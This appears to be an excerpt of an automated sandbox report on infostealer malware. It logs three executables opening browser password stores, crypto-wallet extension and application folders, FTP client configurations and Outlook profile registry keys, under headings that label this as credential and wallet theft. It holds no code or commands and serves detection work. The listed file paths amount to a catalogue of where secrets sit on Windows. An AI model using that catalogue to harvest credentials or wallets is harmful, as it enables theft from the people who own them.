Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004

Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\TQDGENUHWP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\TQDGENUHWP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\TQDGENUHWP
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI
